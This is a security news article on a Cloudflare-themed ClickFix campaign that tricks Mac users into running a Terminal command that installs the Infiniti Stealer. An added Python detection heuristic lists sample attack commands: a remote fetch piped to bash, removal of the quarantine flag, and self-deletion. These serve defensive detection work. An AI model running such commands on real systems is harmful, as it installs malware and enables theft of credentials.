Cloudflare-Themed ClickFix Attack Drops Infiniti Stealer on Macs

The infection chain includes a fake CAPTCHA page, a Bash script, a Nuitka loader, and the Python-based infostealer.

macOS users are targeted in a fresh ClickFix campaign that uses a Cloudflare-themed verification page to deliver a Python-based information stealer, Malwarebytes reports.

The attack starts with a fake CAPTCHA page styled as a legitimate Cloudflare human verification check, which asks visitors to paste and execute a command in Terminal.

Referred to as ClickFix, the technique relies on social engineering to trick users into executing malicious commands on their devices and has been widely used in attacks since August 2024, mainly against Windows users.

For more than half a year, however, attacks tailored for macOS have become increasingly convincing, and the variant observed by Malwarebytes is no different.

The fake verification page gives macOS users step-by-step instructions to open Terminal and paste and run a bogus verification command, which is what triggers the malware.

Once the victim runs the command, a Bash script is fetched from a remote server. The script decodes an embedded payload, writes the second-stage binary to a temporary folder, removes its quarantine flag so Gatekeeper does not intervene, and executes it.

The script also passes the command-and-control (C&C) server details and authentication tokens to the binary as environment variables, deletes itself, and closes the Terminal window.

The binary dropped by the script is a loader compiled using Nuitka. The compiler transforms Python code into a native binary, making static analysis more difficult.

At runtime, the loader decompresses embedded data and launches the final payload, identified as the Infiniti Stealer malware.
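The Bash stage described above leaves a recognisable sequence of shell commands behind: a remote fetch piped into a shell, a payload decode, a write to a temporary folder, quarantine-flag removal, self-deletion, and Terminal being closed. The following detection heuristic is an added example written for this article, not code from Malwarebytes or SecurityWeek; it scores constructed process-execution events (field names and the threshold are assumptions) so that one benign use of /tmp does not alert while the full chain does.

```python
import re
from collections import defaultdict

# Observable steps of the chain, as (label, regex over the command line, weight).
# Quarantine-flag removal is weighted highest: it is rarely typed in routine use.
INDICATORS = [
    ("remote_fetch_to_shell", re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"), 2),
    ("payload_decode", re.compile(r"\bbase64\b.*(-d\b|--decode)"), 1),
    ("write_to_temp", re.compile(r"(/tmp/|/var/folders/|\$TMPDIR)"), 1),
    ("quarantine_removal", re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine|\s-c\b)"), 3),
    ("self_delete", re.compile(r"\brm\b.*\$0"), 1),
    ("terminal_close", re.compile(r"osascript.*Terminal.*quit", re.I), 2),
]
ALERT_THRESHOLD = 5  # assumption: tune against your own baseline

# Constructed process-execution events, not real telemetry. Field names are
# assumptions; "session" groups commands launched from one Terminal window.
SAMPLE_EVENTS = [
    {"session": 1, "cmdline": "git status"},
    {"session": 1, "cmdline": "ls -la /tmp/build"},
    {"session": 2, "cmdline": "curl -fsSL https://verify.example.invalid/c | bash"},
    {"session": 2, "cmdline": "base64 --decode -o /tmp/.x /tmp/.x.b64"},
    {"session": 2, "cmdline": "xattr -d com.apple.quarantine /tmp/.x"},
    {"session": 2, "cmdline": 'rm -f "$0"'},
    {"session": 2, "cmdline": "osascript -e 'tell application \"Terminal\" to quit'"},
]

def score_sessions(events):
    """Return {session: (score, sorted matched labels)} over all events."""
    by_session = defaultdict(set)
    for ev in events:
        for label, pattern, _ in INDICATORS:
            if pattern.search(ev["cmdline"]):
                by_session[ev["session"]].add(label)
    weights = {label: w for label, _, w in INDICATORS}
    return {sid: (sum(weights[l] for l in labels), sorted(labels))
            for sid, labels in by_session.items()}

def alerting_sessions(events, threshold=ALERT_THRESHOLD):
    """Sessions whose combined indicator weight reaches the threshold."""
    return sorted(sid for sid, (score, _) in score_sessions(events).items()
                  if score >= threshold)

if __name__ == "__main__":
    for sid, (score, labels) in sorted(score_sessions(SAMPLE_EVENTS).items()):
        print(f"session {sid}: score={score} {labels}")
    print("alerting sessions:", alerting_sessions(SAMPLE_EVENTS))
```

Feeding real endpoint telemetry into this means mapping your EDR's process-event fields onto `session` and `cmdline`; the individual indicators are weak on their own, so only the combination within one session is treated as an alert.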

The Python-based information stealer targets browser credentials, Keychain information, cryptocurrency wallets, secrets stored in developer files, and screenshots captured during execution.

The data is sent to the C&C via HTTP POST requests. Once the operation has been completed, the malware sends a notification to a Telegram channel and queues captured credentials to be cracked on the server.

For evasion, Infiniti Stealer relies on a randomized execution delay and checks whether the system is a known analysis environment.

“Infiniti Stealer shows how techniques that worked on Windows—like ClickFix—are now being adapted to target Mac users. It also uses newer techniques, like compiling Python into native apps, which makes the malware harder to detect and analyze. If this approach proves effective, we may see more attacks like this,” Malwarebytes notes.

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
